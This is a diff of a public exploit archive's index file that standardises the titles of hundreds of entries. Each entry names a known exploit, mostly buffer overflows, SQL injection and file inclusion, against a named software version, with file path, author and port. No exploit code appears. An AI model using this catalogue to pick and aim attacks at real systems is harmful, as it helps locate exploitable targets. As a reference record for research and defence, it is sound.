16276,platforms/php/webapps/16276.txt,"ADAN Neuronlabs (view.php) SQL Injection Vulnerability",2011-03-04,IRAQ_JAGUAR,php,webapps,0 -16278,platforms/hardware/remote/16278.py,"iPod Touch/iPhone iFileExplorer Free Directory Traversal",2011-03-04,theSmallNothin,hardware,remote,0 -16279,platforms/php/webapps/16279.txt,"MySms v1.0 Multiple Vulnerabilities",2011-03-05,AtT4CKxT3rR0r1ST,php,webapps,0 +16278,platforms/hardware/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,hardware,remote,0 +16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,AtT4CKxT3rR0r1ST,php,webapps,0 16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 Pre-Auth Local File Inclusion Exploit",2011-03-05,TecR0c,php,webapps,0 -16281,platforms/php/webapps/16281.txt,"BoutikOne (description.php) SQL Injection Vulnerability",2011-03-05,IRAQ_JAGUAR,php,webapps,0 +16281,platforms/php/webapps/16281.txt,"BoutikOne (description.php) SQL Injection Vulnerability",2011-03-05,IRAQ_JAGUAR,php,webapps,0 16283,platforms/win32/shellcode/16283.txt,"win32 eggsearch shellcode (33 bytes)",2011-03-05,oxff,win32,shellcode,0 16284,platforms/unix/dos/16284.rb,"Subversion Date Svnserve",2010-08-07,metasploit,unix,dos,0 16285,platforms/linux/remote/16285.rb,"NTP daemon readvar Buffer Overflow",2010-08-25,metasploit,linux,remote,0 @@ -14131,7 +14131,7 @@ id,file,description,date,author,platform,type,port 16346,platforms/windows/remote/16346.rb,"TFTPDWIN v0.4.2 Long Filename Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16347,platforms/windows/remote/16347.rb,"3CTftpSvc TFTP Long Mode Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16348,platforms/windows/remote/16348.rb,"Quick FTP Pro 2.1 Transfer-Mode Overflow",2010-06-15,metasploit,windows,remote,0 -16349,platforms/windows/remote/16349.rb,"TFTPD32 <= 2.21 Long Filename Buffer Overflow",2010-09-20,metasploit,windows,remote,0 +16349,platforms/windows/remote/16349.rb,"TFTPD32 <= 2.21- Long Filename Buffer Overflow",2010-09-20,metasploit,windows,remote,0 16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP Server 1.9 Long Filename Overflow",2011-03-05,metasploit,windows,remote,0 16351,platforms/windows/remote/16351.rb,"SIPfoundry sipXezPhone 0.35a CSeq Field Overflow",2010-06-15,metasploit,windows,remote,0 16352,platforms/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow",2010-06-15,metasploit,windows,remote,0 @@ -14145,7 +14145,7 @@ id,file,description,date,author,platform,type,port 16360,platforms/windows/remote/16360.rb,"Microsoft Windows SMB Relay Code Execution",2010-09-21,metasploit,windows,remote,0 16361,platforms/windows/remote/16361.rb,"Microsoft Print Spooler Service Impersonation Vulnerability",2011-02-17,metasploit,windows,remote,0 16362,platforms/windows/remote/16362.rb,"Microsoft Server Service Relative Path Stack Corruption",2011-01-21,metasploit,windows,remote,0 -16363,platforms/windows/remote/16363.rb,"Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",2010-07-03,metasploit,windows,remote,0 +16363,platforms/windows/remote/16363.rb,"Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",2010-07-03,metasploit,windows,remote,0 16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service Overflow",2010-05-09,metasploit,windows,remote,0 16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service Overflow",2010-08-30,metasploit,windows,dos,0 16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)",2010-09-28,metasploit,windows,remote,0 @@ -14170,7 +14170,7 @@ id,file,description,date,author,platform,type,port 16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 Wireless Driver Beacon Rates Overflow",2010-07-03,metasploit,windows,remote,0 16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver Probe Response SSID Overflow",2010-07-03,metasploit,hardware,remote,0 -16388,platforms/hardware/remote/16388.rb,"NetGear WG111v2 Wireless Driver Long Beacon Overflow",2010-07-03,metasploit,hardware,remote,0 +16388,platforms/hardware/remote/16388.rb,"NetGear WG111v2 Wireless Driver - Long Beacon Overflow",2010-07-03,metasploit,hardware,remote,0 16389,platforms/windows/remote/16389.rb,"Omni-NFS Server Buffer Overflow",2010-11-11,metasploit,windows,remote,0 16390,platforms/windows/remote/16390.rb,"Energizer DUO Trojan Code Execution",2010-09-20,metasploit,windows,remote,0 16391,platforms/windows/remote/16391.rb,"EMC AlphaStor Agent Buffer Overflow",2010-05-09,metasploit,windows,remote,0 @@ -14201,7 +14201,7 @@ id,file,description,date,author,platform,type,port 16416,platforms/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow",2010-11-04,metasploit,windows,remote,0 16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow",2010-10-05,metasploit,windows,remote,0 16418,platforms/windows/remote/16418.rb,"CA BrightStor ARCserve Message Engine Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16419,platforms/windows/remote/16419.rb,"Mercury/32 <= v4.01b PH Server Module Buffer Overflow",2010-06-15,metasploit,windows,remote,0 +16419,platforms/windows/remote/16419.rb,"Mercury/32 <= 4.01b - PH Server Module Buffer Overflow",2010-06-15,metasploit,windows,remote,0 16420,platforms/windows/remote/16420.rb,"Firebird Relational Database SVC_attach() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 16421,platforms/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16422,platforms/windows/remote/16422.rb,"mIRC <= 6.34 PRIVMSG Handling Stack Buffer Overflow",2010-06-22,metasploit,windows,remote,0 @@ -14218,12 +14218,12 @@ id,file,description,date,author,platform,type,port 16433,platforms/windows/remote/16433.rb,"Bomberclone 0.11.6 Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16434,platforms/windows/remote/16434.rb,"Borland CaliberRM StarTeam Multicast Service Buffer Overflow",2010-06-15,metasploit,windows,remote,0 16435,platforms/windows/remote/16435.rb,"HP OmniInet.exe MSG_PROTOCOL Buffer Overflow",2010-09-20,metasploit,windows,remote,0 -16436,platforms/windows/remote/16436.rb,"Netcat v1.10 NT Stack Buffer Overflow",2010-06-22,metasploit,windows,remote,0 +16436,platforms/windows/remote/16436.rb,"Netcat 1.10 - NT Stack Buffer Overflow",2010-06-22,metasploit,windows,remote,0 16437,platforms/windows/remote/16437.rb,"Borland InterBase isc_create_database() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 16438,platforms/windows/remote/16438.rb,"eIQNetworks ESA Topology DELETEDEVICE Overflow",2010-09-20,metasploit,windows,remote,0 16439,platforms/windows/remote/16439.rb,"NetTransport Download Manager 2.90.510 Buffer Overflow",2010-08-25,metasploit,windows,remote,0 16440,platforms/windows/remote/16440.rb,"Firebird Relational Database isc_attach_database() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 -16441,platforms/windows/remote/16441.rb,"POP Peeper v3.4 DATE Buffer Overflow",2010-11-11,metasploit,windows,remote,0 +16441,platforms/windows/remote/16441.rb,"POP Peeper 3.4 - DATE Buffer Overflow",2010-11-11,metasploit,windows,remote,0 16442,platforms/windows/remote/16442.rb,"Microsoft DirectX DirectShow SAMI Buffer Overflow",2010-10-05,metasploit,windows,remote,0 16443,platforms/windows/remote/16443.rb,"Eureka Email 2.2q ERR Remote Buffer Overflow Exploit",2010-08-25,metasploit,windows,remote,0 16444,platforms/windows/remote/16444.rb,"TinyIdentD 2.2 Stack Buffer Overflow",2010-09-20,metasploit,windows,remote,0 @@ -14240,7 +14240,7 @@ id,file,description,date,author,platform,type,port 16455,platforms/windows/remote/16455.rb,"HP OmniInet.exe MSG_PROTOCOL Buffer Overflow",2010-09-20,metasploit,windows,remote,0 16456,platforms/windows/remote/16456.rb,"Realtek Media Player Playlist Buffer Overflow",2010-11-24,metasploit,windows,remote,0 16457,platforms/windows/remote/16457.rb,"LANDesk Management Suite 8.7 Alert Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16458,platforms/windows/remote/16458.rb,"POP Peeper v3.4 UIDL Buffer Overflow",2010-11-30,metasploit,windows,remote,0 +16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow",2010-11-30,metasploit,windows,remote,0 16459,platforms/windows/remote/16459.rb,"Talkative IRC v0.4.4.16 Response Buffer Overflow",2010-11-11,metasploit,windows,remote,0 16460,platforms/windows/remote/16460.rb,"SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow",2010-05-09,metasploit,windows,remote,0 @@ -14255,10 +14255,10 @@ id,file,description,date,author,platform,type,port 16470,platforms/windows/remote/16470.rb,"Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow",2010-07-25,metasploit,windows,remote,0 16471,platforms/windows/remote/16471.rb,"Microsoft IIS WebDAV Write Access Code Execution",2010-09-20,metasploit,windows,remote,0 16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 IDQ Path Overflow",2010-06-15,metasploit,windows,remote,0 -16473,platforms/windows/remote/16473.rb,"Mercury/32 <= 4.01b LOGIN Buffer Overflow",2010-06-22,metasploit,windows,remote,0 +16473,platforms/windows/remote/16473.rb,"Mercury/32 <= 4.01b - LOGIN Buffer Overflow",2010-06-22,metasploit,windows,remote,0 16474,platforms/windows/remote/16474.rb,"Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow",2010-07-01,metasploit,windows,remote,0 16475,platforms/windows/remote/16475.rb,"MailEnable IMAPD (2.35) Login Request Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16476,platforms/windows/remote/16476.rb,"Mercur v5.0 IMAP SP3 SELECT Buffer Overflow",2010-09-20,metasploit,windows,remote,0 +16476,platforms/windows/remote/16476.rb,"Mercur 5.0 - IMAP SP3 SELECT Buffer Overflow",2010-09-20,metasploit,windows,remote,0 16477,platforms/windows/remote/16477.rb,"Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow",2010-06-22,metasploit,windows,remote,0 16478,platforms/windows/remote/16478.rb,"Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16479,platforms/windows/remote/16479.rb,"IMail IMAP4D Delete Overflow",2010-09-20,metasploit,windows,remote,0 @@ -14266,14 +14266,14 @@ id,file,description,date,author,platform,type,port 16481,platforms/windows/remote/16481.rb,"Mercur Messaging 2005 IMAP Login Buffer Overflow",2010-08-25,metasploit,windows,remote,0 16482,platforms/windows/remote/16482.rb,"MDaemon 9.6.4 IMAPD FETCH Buffer Overflow",2010-06-15,metasploit,windows,remote,0 16483,platforms/windows/remote/16483.rb,"Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16484,platforms/windows/remote/16484.rb,"Mercury/32 v4.01a IMAP RENAME Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16485,platforms/windows/remote/16485.rb,"MailEnable IMAPD (1.54) STATUS Request Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16486,platforms/windows/remote/16486.rb,"Novell NetMail <=3.52d IMAP AUTHENTICATE Buffer Overflow",2010-05-09,metasploit,windows,remote,0 +16484,platforms/windows/remote/16484.rb,"Mercury/32 4.01a - IMAP RENAME Buffer Overflow",2010-05-09,metasploit,windows,remote,0 +16485,platforms/windows/remote/16485.rb,"MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow",2010-04-30,metasploit,windows,remote,0 +16486,platforms/windows/remote/16486.rb,"Novell NetMail <= 3.52d - IMAP AUTHENTICATE Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16487,platforms/windows/remote/16487.rb,"Ipswitch IMail IMAP SEARCH Buffer Overflow",2010-06-15,metasploit,windows,remote,0 16488,platforms/windows/remote/16488.rb,"Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16489,platforms/windows/remote/16489.rb,"RealVNC 3.3.7 Client Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16490,platforms/windows/remote/16490.rb,"UltraVNC 1.0.1 Client Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16491,platforms/windows/remote/16491.rb,"WinVNC Web Server <= v3.3.3r7 GET Overflow",2009-12-06,metasploit,windows,remote,0 +16491,platforms/windows/remote/16491.rb,"WinVNC Web Server <= 3.3.3r7 - GET Overflow",2009-12-06,metasploit,windows,remote,0 16492,platforms/windows/remote/16492.rb,"Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow",2010-09-21,metasploit,windows,remote,0 16493,platforms/windows/remote/16493.rb,"EnjoySAP SAP GUI ActiveX Control Arbitrary File Download",2010-12-01,metasploit,windows,remote,0 16494,platforms/windows/remote/16494.rb,"Adobe CoolType SING Table ""uniqueName"" Stack Buffer Overflow",2010-09-20,metasploit,windows,remote,0 @@ -14330,7 +14330,7 @@ id,file,description,date,author,platform,type,port 16545,platforms/windows/remote/16545.rb,"Microsoft Help Center XSS and Command Execution",2010-09-20,metasploit,windows,remote,0 16546,platforms/windows/local/16546.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow",2010-09-20,metasploit,windows,local,0 16547,platforms/windows/remote/16547.rb,"Internet Explorer Style getElementsByTagName Memory Corruption",2010-07-12,metasploit,windows,remote,0 -16548,platforms/windows/remote/16548.rb,"Amaya Browser v11.0 bdo tag overflow",2010-05-09,metasploit,windows,remote,0 +16548,platforms/windows/remote/16548.rb,"Amaya Browser 11.0 - bdo tag Overflow",2010-05-09,metasploit,windows,remote,0 16549,platforms/windows/remote/16549.rb,"Internet Explorer isComponentInstalled Overflow",2010-05-09,metasploit,windows,remote,0 16550,platforms/windows/remote/16550.rb,"WebDAV Application DLL Hijacker",2010-09-24,metasploit,windows,remote,0 16551,platforms/windows/remote/16551.rb,"Internet Explorer CSS SetUserClip Memory Corruption",2011-01-20,metasploit,windows,remote,0 @@ -14347,7 +14347,7 @@ id,file,description,date,author,platform,type,port 16562,platforms/windows/local/16562.rb,"Apple ITunes 4.7 Playlist Buffer Overflow",2010-05-09,metasploit,windows,local,0 16563,platforms/windows/remote/16563.rb,"Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow",2010-06-15,metasploit,windows,remote,0 16564,platforms/windows/remote/16564.rb,"Internet Explorer WebViewFolderIcon setSlice() Overflow",2010-07-03,metasploit,windows,remote,0 -16565,platforms/windows/remote/16565.rb,"RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow",2010-05-09,metasploit,windows,remote,0 +16565,platforms/windows/remote/16565.rb,"RKD Software BarCodeAx.dll 4.9 - ActiveX Remote Stack Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16566,platforms/windows/remote/16566.rb,"CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow",2010-07-26,metasploit,windows,remote,0 16567,platforms/windows/remote/16567.rb,"Internet Explorer Tabular Data Control ActiveX Memory Corruption",2010-04-30,metasploit,windows,remote,0 16568,platforms/windows/remote/16568.rb,"Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 @@ -14385,7 +14385,7 @@ id,file,description,date,author,platform,type,port 16600,platforms/windows/remote/16600.rb,"Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute",2010-11-24,metasploit,windows,remote,0 16601,platforms/windows/remote/16601.rb,"FlipViewer FViewerLoading ActiveX Control Buffer Overflow",2010-06-15,metasploit,windows,remote,0 16602,platforms/windows/remote/16602.rb,"Macrovision InstallShield Update Service ActiveX Unsafe Method",2010-09-20,metasploit,windows,remote,0 -16603,platforms/windows/remote/16603.rb,"NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 +16603,platforms/windows/remote/16603.rb,"NCTAudioFile2 2.x - ActiveX Control SetFormatLikeSample() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 16604,platforms/windows/remote/16604.rb,"WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow",2010-09-20,metasploit,windows,remote,0 16605,platforms/windows/remote/16605.rb,"Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download",2010-09-20,metasploit,windows,remote,0 16606,platforms/windows/local/16606.rb,"Adobe Collab.getIcon() Buffer Overflow",2010-04-30,metasploit,windows,local,0 @@ -14403,7 +14403,7 @@ id,file,description,date,author,platform,type,port 16618,platforms/windows/local/16618.rb,"BlazeDVD 5.1 PLF Buffer Overflow",2010-11-11,metasploit,windows,local,0 16619,platforms/windows/local/16619.rb,"Adobe CoolType SING Table ""uniqueName"" Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0 16620,platforms/windows/local/16620.rb,"Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)",2011-01-08,metasploit,windows,local,0 -16621,platforms/windows/local/16621.rb,"Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0 +16621,platforms/windows/local/16621.rb,"Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0 16622,platforms/windows/local/16622.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",2010-09-25,metasploit,windows,local,0 16623,platforms/windows/local/16623.rb,"Adobe Doc.media.newPlayer Use After Free Vulnerability",2010-09-25,metasploit,windows,local,0 16624,platforms/windows/local/16624.rb,"Adobe util.printf() Buffer Overflow",2010-09-25,metasploit,windows,local,0 @@ -14437,31 +14437,31 @@ id,file,description,date,author,platform,type,port 16652,platforms/windows/local/16652.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow",2010-09-25,metasploit,windows,local,0 16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0 16654,platforms/windows/local/16654.rb,"Orbital Viewer ORB File Parsing Buffer Overflow",2010-03-09,metasploit,windows,local,0 -16655,platforms/windows/local/16655.rb,"ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0 +16655,platforms/windows/local/16655.rb,"ProShow Gold 4.0.2549 - (PSH File) Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0 16656,platforms/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer Buffer Overflow",2010-12-16,metasploit,windows,local,0 16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration Buffer Overflow",2010-09-25,metasploit,aix,dos,0 16658,platforms/windows/local/16658.rb,"VUPlayer CUE Buffer Overflow",2010-11-11,metasploit,windows,local,0 -16659,platforms/aix/local/16659.rb,"Cain & Abel <= v4.9.24 RDP Buffer Overflow",2010-11-24,metasploit,aix,local,0 +16659,platforms/aix/local/16659.rb,"Cain & Abel <= 4.9.24 - RDP Buffer Overflow",2010-11-24,metasploit,aix,local,0 16660,platforms/windows/local/16660.rb,"Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow",2011-02-08,metasploit,windows,local,0 16661,platforms/windows/local/16661.rb,"Audio Workstation 6.4.2.4.3 pls Buffer Overflow",2010-09-25,metasploit,windows,local,0 -16662,platforms/windows/local/16662.rb,"A-PDF WAV to MP3 v1.0.0 Buffer Overflow",2010-11-11,metasploit,windows,local,0 +16662,platforms/windows/local/16662.rb,"A-PDF WAV to MP3 1.0.0 - Buffer Overflow",2010-11-11,metasploit,windows,local,0 16663,platforms/windows/local/16663.rb,"S.O.M.P.L 1.0 Player Buffer Overflow",2010-11-11,metasploit,windows,local,0 16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 Buffer Overflow Exploit",2010-09-25,metasploit,windows,local,0 16665,platforms/windows/local/16665.rb,"Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0 16666,platforms/windows/local/16666.rb,"UltraISO CCD File Parsing Buffer Overflow",2010-04-30,metasploit,windows,local,0 16667,platforms/windows/local/16667.rb,"Adobe Flash Player ""Button"" Remote Code Execution",2010-11-01,metasploit,windows,local,0 16668,platforms/windows/local/16668.rb,"BACnet OPC Client Buffer Overflow",2010-11-14,metasploit,windows,local,0 -16669,platforms/windows/local/16669.rb,"Adobe Illustrator CS4 v14.0.0",2010-09-25,metasploit,windows,local,0 +16669,platforms/windows/local/16669.rb,"Adobe Illustrator CS4 14.0.0 - Postscript (.eps) Buffer Overflow",2010-09-25,metasploit,windows,local,0 16670,platforms/windows/local/16670.rb,"Adobe Acrobat Bundled LibTIFF Integer Overflow",2010-09-25,metasploit,windows,local,0 16671,platforms/windows/local/16671.rb,"Adobe PDF Embedded EXE Social Engineering",2010-12-16,metasploit,windows,local,0 16672,platforms/windows/local/16672.rb,"Adobe JBIG2Decode Memory Corruption Exploit",2010-09-25,metasploit,windows,local,0 -16673,platforms/windows/local/16673.rb,"Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow",2010-11-11,metasploit,windows,local,0 +16673,platforms/windows/local/16673.rb,"Digital Music Pad 8.2.3.3.4 - Stack Buffer Overflow",2010-11-11,metasploit,windows,local,0 16674,platforms/windows/local/16674.rb,"Adobe Collab.collectEmailInfo() Buffer Overflow",2010-09-25,metasploit,windows,local,0 16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner (DBR File) Path Buffer Overflow",2010-09-20,metasploit,windows,local,0 16676,platforms/windows/local/16676.rb,"Mini-Stream 3.0.1.1 Buffer Overflow Exploit",2011-01-08,metasploit,windows,local,0 16677,platforms/windows/local/16677.rb,"CA Antivirus Engine CAB Buffer Overflow",2010-11-11,metasploit,windows,local,0 16678,platforms/windows/local/16678.rb,"VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow",2010-09-20,metasploit,windows,local,0 -16679,platforms/windows/local/16679.rb,"Nuance PDF Reader v6.0 Launch Stack Buffer Overflow",2011-01-08,metasploit,windows,local,0 +16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow",2011-01-08,metasploit,windows,local,0 16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic VBP Buffer Overflow",2010-09-25,metasploit,windows,local,0 16681,platforms/windows/local/16681.rb,"Adobe Collab.getIcon() Buffer Overflow",2010-09-25,metasploit,windows,local,0 16682,platforms/windows/local/16682.rb,"Adobe PDF Escape EXE Social Engineering (No JavaScript)",2010-12-16,metasploit,windows,local,0 @@ -14471,7 +14471,7 @@ id,file,description,date,author,platform,type,port 16686,platforms/windows/local/16686.rb,"Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)",2011-03-04,metasploit,windows,local,0 16687,platforms/windows/local/16687.rb,"Adobe Flash Player ""newfunction"" Invalid Pointer Use",2010-09-25,metasploit,windows,local,0 16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow",2010-11-24,metasploit,windows,local,0 -16689,platforms/windows/remote/16689.rb,"CCProxy <= v6.2 Telnet Proxy Ping Overflow",2010-04-30,metasploit,windows,remote,23 +16689,platforms/windows/remote/16689.rb,"CCProxy <= 6.2 - Telnet Proxy Ping Overflow",2010-04-30,metasploit,windows,remote,23 16690,platforms/windows/remote/16690.rb,"Qbik WinGate WWW Proxy Server URL Processing Overflow",2010-09-20,metasploit,windows,remote,80 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy Host Header Overflow",2010-07-12,metasploit,windows,remote,80 16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow",2010-09-20,metasploit,windows,remote,3128 @@ -14484,13 +14484,13 @@ id,file,description,date,author,platform,type,port 16699,platforms/windows/remote/16699.rb,"Outlook ATTACH_BY_REF_RESOLVE File Execution",2010-09-20,metasploit,windows,remote,0 16700,platforms/windows/remote/16700.rb,"Outlook ATTACH_BY_REF_ONLY File Execution",2010-09-20,metasploit,windows,remote,0 16701,platforms/windows/remote/16701.rb,"MySQL yaSSL SSL Hello Message Buffer Overflow",2010-05-09,metasploit,windows,remote,3306 -16702,platforms/windows/remote/16702.rb,"KarjaSoft Sami FTP Server v2.02 USER Overflow",2010-04-30,metasploit,windows,remote,21 +16702,platforms/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.02 - USER Overflow",2010-04-30,metasploit,windows,remote,21 16703,platforms/windows/remote/16703.rb,"GlobalSCAPE Secure FTP Server Input Overflow",2010-10-05,metasploit,windows,remote,0 16704,platforms/windows/remote/16704.rb,"LeapFTP 3.0.1 Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 -16705,platforms/windows/remote/16705.rb,"Seagull FTP v3.3 build 409 Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 +16705,platforms/windows/remote/16705.rb,"Seagull FTP 3.3 build 409 - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 16706,platforms/windows/remote/16706.rb,"War-FTPD 1.65 Password Overflow",2010-07-03,metasploit,windows,remote,0 16707,platforms/windows/remote/16707.rb,"freeFTPd 1.0 Username Overflow",2010-07-03,metasploit,windows,remote,0 -16708,platforms/windows/remote/16708.rb,"LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow",2010-04-30,metasploit,windows,remote,0 +16708,platforms/windows/remote/16708.rb,"LeapWare LeapFTP 2.7.3.600 - PASV Reply Client Overflow",2010-04-30,metasploit,windows,remote,0 16709,platforms/windows/remote/16709.rb,"ProFTP 2.9 Banner Remote Buffer Overflow Exploit",2010-07-03,metasploit,windows,remote,0 16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 PASV Remote Buffer Overflow",2010-06-15,metasploit,windows,remote,0 16711,platforms/windows/remote/16711.rb,"EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow",2010-07-27,metasploit,windows,remote,0 @@ -14507,7 +14507,7 @@ id,file,description,date,author,platform,type,port 16722,platforms/windows/remote/16722.rb,"Xlink FTP Client Buffer Overflow",2010-11-11,metasploit,windows,remote,0 16723,platforms/windows/remote/16723.rb,"Vermillion FTP Daemon PORT Command Memory Corruption",2010-09-20,metasploit,windows,remote,0 16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 Username Overflow",2010-07-03,metasploit,windows,remote,0 -16725,platforms/windows/remote/16725.rb,"FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)",2010-11-14,metasploit,windows,remote,0 +16725,platforms/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD)",2010-11-14,metasploit,windows,remote,0 16726,platforms/windows/remote/16726.rb,"FTPPad 1.2.0 Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 16727,platforms/windows/remote/16727.rb,"Sasser Worm avserve FTP PORT Buffer Overflow",2010-04-30,metasploit,windows,remote,5554 16728,platforms/windows/remote/16728.rb,"Gekko Manager FTP Client Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 @@ -14520,7 +14520,7 @@ id,file,description,date,author,platform,type,port 16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD USER Buffer Overflow",2010-10-05,metasploit,windows,remote,0 16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 16737,platforms/windows/remote/16737.rb,"EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16738,platforms/windows/remote/16738.rb,"AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST)",2010-11-14,metasploit,windows,remote,0 +16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 - (Win32) Stack Buffer Overflow (LIST)",2010-11-14,metasploit,windows,remote,0 16739,platforms/windows/remote/16739.rb,"Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit",2010-04-30,metasploit,windows,remote,21 16740,platforms/windows/remote/16740.rb,"Microsoft IIS FTP Server NLST Response Overflow",2010-11-12,metasploit,windows,remote,21 16741,platforms/windows/remote/16741.rb,"Texas Imperial Software WFTPD 3.23 SIZE Overflow",2010-06-22,metasploit,windows,remote,0 @@ -14604,7 +14604,7 @@ id,file,description,date,author,platform,type,port 16819,platforms/windows/remote/16819.rb,"SoftiaCom WMailserver 1.0 Buffer Overflow",2010-05-09,metasploit,windows,remote,25 16820,platforms/windows/remote/16820.rb,"MS03-046 Exchange 2000 XEXCH50 Heap Overflow",2010-11-11,metasploit,windows,remote,25 16821,platforms/windows/remote/16821.rb,"Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow",2010-06-22,metasploit,windows,remote,25 -16822,platforms/windows/remote/16822.rb,"TABS MailCarrier v2.51 SMTP EHLO Overflow",2010-04-30,metasploit,windows,remote,25 +16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow",2010-04-30,metasploit,windows,remote,25 16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 LDAP Buffer Overflow",2010-11-14,metasploit,windows,remote,389 16824,platforms/windows/remote/16824.rb,"IMail LDAP Service Buffer Overflow",2010-04-30,metasploit,windows,remote,389 16825,platforms/windows/remote/16825.rb,"CA CAM log_security() Stack Buffer Overflow 